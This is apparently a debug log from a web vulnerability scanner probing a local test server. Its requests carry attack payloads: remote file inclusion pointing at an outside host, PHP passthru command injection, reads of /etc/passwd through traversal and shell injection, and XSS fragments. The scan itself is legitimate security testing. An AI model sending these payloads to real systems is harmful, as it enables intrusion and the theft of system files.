documents:3.0.2.1706&service_name=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false returned HTTP code "404" (id=23475,from_cache=0,grep=1,rtt=0.11,did=WCwdkdye) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/b2-include/b2edit.showposts.php?b2inc=http://cirt.net/rfiinc.txt&cmd=ls returned HTTP code "404" (id=23483,from_cache=0,grep=1,rtt=0.10,did=L4CoPhyr) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/perl/-e "system(\'cat /etc/passwd\');\\" returned HTTP code "404" (id=23489,from_cache=0,grep=1,rtt=0.10,did=5jSvb0qv) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=23485,from_cache=0,grep=1,rtt=0.10,did=qh3DYXpo) [Wed Feb 12 10:04:30 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12105, 'reject-seen-url': 5613, 'reject-out-of-scope': 216, 'accept': 4916} [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=23493,from_cache=0,grep=1,rtt=0.03,did=yGBIAaqU) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/admin.htm returned HTTP code "404" (id=23487,from_cache=0,grep=1,rtt=0.08,did=QgPEbyv6) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/null.htw?CiWebHitsFile=/default.asp &CiRestriction=none&CiHiliteType=Full returned HTTP code "404" (id=23481,from_cache=0,grep=1,rtt=0.11,did=Tby7UVEJ) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/81/exec/show returned HTTP code "404" (id=23492,from_cache=0,grep=1,rtt=0.18,did=lo7N7ddL) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/iissamples/exair/search/search.asp returned HTTP code "404" (id=23494,from_cache=0,grep=1,rtt=0.04,did=pQfo90EB) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/megabook/files/20/setup.db returned HTTP code "404" (id=23491,from_cache=0,grep=1,rtt=0.12,did=c4wGpwn8) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2199. [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4514. [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/34/exec/show returned HTTP code "404" (id=23496,from_cache=0,grep=1,rtt=0.03,did=9q5TIJBj) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/cfdocs.map returned HTTP code "404" (id=23497,from_cache=0,grep=1,rtt=0.09,did=v7lPWtfI) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/ab2/\\@AdminViewError returned HTTP code "404" (id=23498,from_cache=0,grep=1,rtt=0.24,did=nseuLslp) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/16/level/16/exec/show/version returned HTTP code "404" (id=23495,from_cache=0,grep=1,rtt=0.10,did=KdZALdp0) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2200. [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4515. [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2201. [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/cgi-bin/randhtml.cgi returned HTTP code "404" (id=23499,from_cache=0,grep=1,rtt=0.03,did=7qGSwT33) [Wed Feb 12 10:04:30 2020 - debug] localhost:9090 connection pool stats (free:155 / in_use:7 / max:50 / total:162) [Wed Feb 12 10:04:30 2020 - debug] Connections with more in use time: (2c028824f4fc0477, 0.12 sec) (520e7ffb468c62bc, 0.11 sec) (af4838a5ce93b7f0, 0.10 sec) (c26e7cc18109a4d2, 0.09 sec) (6ddc0bd1613c77bd, 0.05 sec) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/phpBB/viewtopic.php?t=2&rush=ls -al&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23502,from_cache=0,grep=1,rtt=0.04,did=d64xR2r6) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/gallery/errors/configmode.php?GALLERY_BASEDIR=http://cirt.net/rfiinc.txt returned HTTP code "404" (id=23503,from_cache=0,grep=1,rtt=0.19,did=nx6wWImv) [Wed Feb 12 10:04:30 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12121, 'reject-seen-url': 5616, 'reject-out-of-scope': 216, 'accept': 4922} [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/ssdefs/siteseed.dtd returned HTTP code "404" (id=23504,from_cache=0,grep=1,rtt=0.08,did=3fScsrYv) [Wed Feb 12 10:04:30 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12121, 'reject-seen-url': 5616, 'reject-out-of-scope': 216, 'accept': 4922} [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/91/exec/show returned HTTP code "404" (id=23505,from_cache=0,grep=1,rtt=0.23,did=CP8bGeZN) [Wed Feb 12 10:04:30 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12121, 'reject-seen-url': 5616, 'reject-out-of-scope': 216, 'accept': 4922} [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/.../.../.../.../.../.../.../.../.../.../etc/passwd returned HTTP code "404" (id=23506,from_cache=0,grep=1,rtt=0.29,did=gUVE44sb) [Wed Feb 12 10:04:30 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12121, 'reject-seen-url': 5616, 'reject-out-of-scope': 216, 'accept': 4922} [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/63/exec/show returned HTTP code "404" (id=23500,from_cache=0,grep=1,rtt=0.19,did=smSuEHnB) [Wed Feb 12 10:04:30 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12121, 'reject-seen-url': 5616, 'reject-out-of-scope': 216, 'accept': 4922} [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/admin/aindex.htm returned HTTP code "404" (id=23507,from_cache=0,grep=1,rtt=0.34,did=6fHWQS4b) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/index.php?rep= returned HTTP code "404" (id=23508,from_cache=0,grep=1,rtt=0.22,did=PpbLlsUS) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2202. [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/cgi-bin/sws/admin.html returned HTTP code "404" (id=23509,from_cache=0,grep=1,rtt=0.08,did=YAkC0MFZ) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/postnuke/html/index.php?name=forums&file=viewtopic&t=2&rush=dir&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23511,from_cache=0,grep=1,rtt=0.11,did=Zc6RQxGT) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/index.php?name=forums&file=viewtopic&t=2&rush=ls -al&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23512,from_cache=0,grep=1,rtt=0.10,did=95ssrPxN) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/54/exec/show returned HTTP code "404" (id=23513,from_cache=0,grep=1,rtt=0.12,did=DOxnTxEM) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/cgi-bin/gbook/gbook.cgi?_MAILTO=xx&ls= returned HTTP code "404" (id=23515,from_cache=0,grep=1,rtt=0.04,did=rWgFSTa1) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/advwebadmin/ returned HTTP code "404" (id=23516,from_cache=0,grep=1,rtt=0.03,did=OXyeouXQ) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/cgi-bin/cgiecho returned HTTP code "404" (id=23517,from_cache=0,grep=1,rtt=0.16,did=zCqpdDUb) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/pvote/ch_info.php?newpass=password&confirm=password returned HTTP code "404" (id=23518,from_cache=0,grep=1,rtt=0.10,did=4rKEgpoH) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/index.php?name=Forums&file=viewtopic&t=2&rush=ls -al&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23510,from_cache=0,grep=1,rtt=0.02,did=3gJH9mgJ) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/zIPVJT.cfm?mode=debug returned HTTP code "404" (id=23519,from_cache=0,grep=1,rtt=0.14,did=rjIG0Crw) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/scripts/samples/search/qsumrhit.htw returned HTTP code "404" (id=23520,from_cache=0,grep=1,rtt=0.12,did=3DbJa3Wu) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/43/exec/show returned HTTP code "404" (id=23514,from_cache=0,grep=1,rtt=0.04,did=CNvwJ2K5) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/73/exec/show returned HTTP code "404" (id=23521,from_cache=0,grep=1,rtt=0.22,did=Tc6iZfHw) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/phorum/admin/stats.php returned HTTP code "404" (id=23530,from_cache=0,grep=1,rtt=0.14,did=TsN4OK83) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/access-log returned HTTP code "404" (id=23531,from_cache=0,grep=1,rtt=0.18,did=094HoroV) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=23523,from_cache=0,grep=1,rtt=0.12,did=7iZh0Eww) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/admin.html returned HTTP code "404" (id=23526,from_cache=0,grep=1,rtt=0.10,did=FzWgOHEO) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/cgi-bin/realhelpdesk.cgi returned HTTP code "404" (id=23525,from_cache=0,grep=1,rtt=0.19,did=V4fImbnL) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=23527,from_cache=0,grep=1,rtt=0.13,did=xvGPgq57) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/25/exec/show returned HTTP code "404" (id=23528,from_cache=0,grep=1,rtt=0.16,did=SS7pA2EW) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/com/novell/ returned HTTP code "404" (id=23522,from_cache=0,grep=1,rtt=0.36,did=H89OAtV6) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/showmail.pl returned HTTP code "404" (id=23529,from_cache=0,grep=1,rtt=0.24,did=44Kjp38W) [Wed Feb 12 10:04:30 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12140, 'reject-seen-url': 5619, 'reject-out-of-scope': 216, 'accept': 4925} [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4515. [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/mailman/listinfo returned HTTP code "404" (id=23532,from_cache=0,grep=1,rtt=0.20,did=E6H5WfbV) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2203. [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4515. [Wed Feb 12 10:04:30 2020 - debug] localhost:9090 connection pool stats (free:164 / in_use:2 / max:50 / total:166) [Wed Feb 12 10:04:30 2020 - debug] Connections with more in use time: (628fec0a6cc955c2, 0.02 sec) (af0e03f83f5f2bc3, 0.00 sec) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/index.php?err=3&email=\\"> returned HTTP code "404" (id=23524,from_cache=0,grep=1,rtt=0.10,did=btaOU8p4) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/SPHERA/login/sm_login_screen.php?error=\\"> returned HTTP code "404" (id=23534,from_cache=0,grep=1,rtt=0.13,did=mUALteKU) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/\\"> returned HTTP code "404" (id=23538,from_cache=0,grep=1,rtt=0.13,did=HFdDazM2) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/modules.php?name=Members_List&sql_debug=1 returned HTTP code "404" (id=23533,from_cache=0,grep=1,rtt=0.20,did=Y3uEA5k2) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/forum/viewtopic.php?t=2&rush=ls -al&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23536,from_cache=0,grep=1,rtt=0.06,did=NIvsYwbK) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/35/exec/show returned HTTP code "404" (id=23541,from_cache=0,grep=1,rtt=0.21,did=1JhFA3Mo) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2204. [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/index.php?name=Forums&file=viewtopic&t=2&rush=dir&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23537,from_cache=0,grep=1,rtt=0.14,did=UymI9jAt) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/16/level/16/exec/show/running-config/interface/FastEthernet returned HTTP code "404" (id=23535,from_cache=0,grep=1,rtt=0.17,did=e6UjkhRq) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4516. [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4517. [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/82/exec/show returned HTTP code "404" (id=23540,from_cache=0,grep=1,rtt=0.16,did=09NKEyGo) [Wed Feb 12 10:04:30 2020 - debug] symfony.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] svn_users.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] meta_generator.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] retirejs.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] file_upload.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:30 2020 - debug] serialized_object.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] blank_body.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] credit_cards.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] websockets_links.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] csp.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] dom_xss.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] keys.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] clamav.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] expect_ct.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] motw.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] vulners_db.grep(uri="http://localhost:9090/dir/") took 0.01s to run [Wed Feb 12 10:04:30 2020 - debug] private_ip.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4518. [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/_vti_pvt/writeto.cnf returned HTTP code "404" (id=23539,from_cache=0,grep=1,rtt=0.21,did=mT0n3yFj) [Wed Feb 12 10:04:30 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] objects.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] error_500.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] meta_tags.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] password_profiling.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] click_jacking.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] lang.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] strange_reason.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] url_session.grep(uri="http://localhost:9090/dir/") took 0.07s to run [Wed Feb 12 10:04:30 2020 - debug] strange_headers.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] ssn.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] oracle.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] feeds.grep(uri="http://localhost:9090/dir/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] cache_control.grep(uri="http://localhost:9090/dir/") took 0.01s to run [Wed Feb 12 10:04:30 2020 - debug] error_pages.grep(uri="http://localhost:9090/dir/") took 0.05s to run [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4519. [Wed Feb 12 10:04:30 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/dir/") took 0.08s to run [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=&cat /etc/passwd|=&CODE=PHOLD returned HTTP code "404" (id=23542,from_cache=0,grep=1,rtt=0.07,did=yyNTWHdg) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/92/exec/show returned HTTP code "404" (id=23543,from_cache=0,grep=1,rtt=0.11,did=lutc3Pu7) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4520. [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/cgi-bin/bslist.cgi?email=x&ls= returned HTTP code "404" (id=23554,from_cache=0,grep=1,rtt=0.06,did=gv5VvZzR) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/publisher/ returned HTTP code "404" (id=23551,from_cache=0,grep=1,rtt=0.09,did=Hn1kZNm6) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/@TOMCATADMINcontextAdmin/contextAdmin.html returned HTTP code "404" (id=23550,from_cache=0,grep=1,rtt=0.09,did=W2mN8tM7) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/cgi-bin/gbadmin.cgi?action=change_adminpass returned HTTP code "404" (id=23548,from_cache=0,grep=1,rtt=0.08,did=WLF8SMIt) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/55/exec/show returned HTTP code "404" (id=23546,from_cache=0,grep=1,rtt=0.06,did=6EMEX0s0) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/apps/ returned HTTP code "404" (id=23552,from_cache=0,grep=1,rtt=0.05,did=J698yJrY) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/64/exec/show returned HTTP code "404" (id=23545,from_cache=0,grep=1,rtt=0.14,did=t0f2qMH3) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/Agent/ returned HTTP code "404" (id=23544,from_cache=0,grep=1,rtt=0.09,did=eeBlZ0YM) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2205. [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/modules/index.php?name=forums&file=viewtopic&t=2&rush=dir&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23553,from_cache=0,grep=1,rtt=0.04,did=2kqm8B9y) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4521. [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2206. [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/44/exec/show returned HTTP code "404" (id=23557,from_cache=0,grep=1,rtt=0.05,did=lbDS70BV) [Wed Feb 12 10:04:30 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12157, 'reject-seen-url': 5622, 'reject-out-of-scope': 216, 'accept': 4930} [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/com/novell/webaccess returned HTTP code "404" (id=23556,from_cache=0,grep=1,rtt=0.06,did=xSlW1LgJ) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/cgi-bin/cgiemail returned HTTP code "404" (id=23555,from_cache=0,grep=1,rtt=0.07,did=iDgmsaGg) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/postnuke/index.php?name=forums&file=viewtopic&t=2&rush=ls -al&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23549,from_cache=0,grep=1,rtt=0.08,did=tGNuKla1) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/index.php?name=forums&file=viewtopic&t=2&rush=ls -al&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23547,from_cache=0,grep=1,rtt=0.11,did=Vb8zmpH3) [Wed Feb 12 10:04:30 2020 - debug] localhost:9090 connection pool stats (free:162 / in_use:4 / max:50 / total:166) [Wed Feb 12 10:04:30 2020 - debug] Connections with more in use time: (84d38f0e7210d883, 0.07 sec) (52311171ab445bb5, 0.05 sec) (0234fcc660fc843a, 0.04 sec) (af4838a5ce93b7f0, 0.04 sec) (5f87bc23684018ff, 0.02 sec) [Wed Feb 12 10:04:30 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/admin.php returned HTTP code "404" (id=23558,from_cache=0,grep=1,rtt=0.10,did=x0zqwDCu) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4522. [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=23560,from_cache=0,grep=1,rtt=0.03,did=g4Jd0oZz) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2207. [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/access.log returned HTTP code "404" (id=23559,from_cache=0,grep=1,rtt=0.09,did=TWuqcD1t) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4523. [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2208. [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/74/exec/show returned HTTP code "404" (id=23561,from_cache=0,grep=1,rtt=0.10,did=7wjjgRsX) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=23565,from_cache=0,grep=1,rtt=0.14,did=bp8jfPmm) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/xNh8T.htw returned HTTP code "404" (id=23566,from_cache=0,grep=1,rtt=0.17,did=xM4LkopD) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/forgot_password.php?email=\\"> returned HTTP code "404" (id=23567,from_cache=0,grep=1,rtt=0.01,did=MS4x5tm7) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=23562,from_cache=0,grep=1,rtt=0.08,did=eKVtPeoN) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=23501,from_cache=0,grep=1,rtt=0.09,did=4AWxDkQc) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/36/exec/show returned HTTP code "404" (id=23564,from_cache=0,grep=1,rtt=0.14,did=JfzL2PrF) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/ayuda/ returned HTTP code "404" (id=23563,from_cache=0,grep=1,rtt=0.15,did=EAfSgqWJ) [Wed Feb 12 10:04:30 2020 - debug] localhost:9090 connection pool stats (free:163 / in_use:7 / max:50 / total:170) [Wed Feb 12 10:04:30 2020 - debug] Connections with more in use time: (84d38f0e7210d883, 0.11 sec) (39f162a2b0bc59d3, 0.09 sec) (4ee15c9b6aa66021, 0.08 sec) (e71de8389d77a835, 0.07 sec) (6ddc0bd1613c77bd, 0.05 sec) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4524. [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/reademail.pl returned HTTP code "404" (id=23568,from_cache=0,grep=1,rtt=0.23,did=nwLt7yn9) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/42/exec/show conf returned HTTP code "404" (id=23570,from_cache=0,grep=1,rtt=0.07,did=iRZshWaO) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/cart/ returned HTTP code "404" (id=23575,from_cache=0,grep=1,rtt=0.17,did=nMBtG030) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/_vti_bin/shtml.exe/junk_nonexistant.exe returned HTTP code "404" 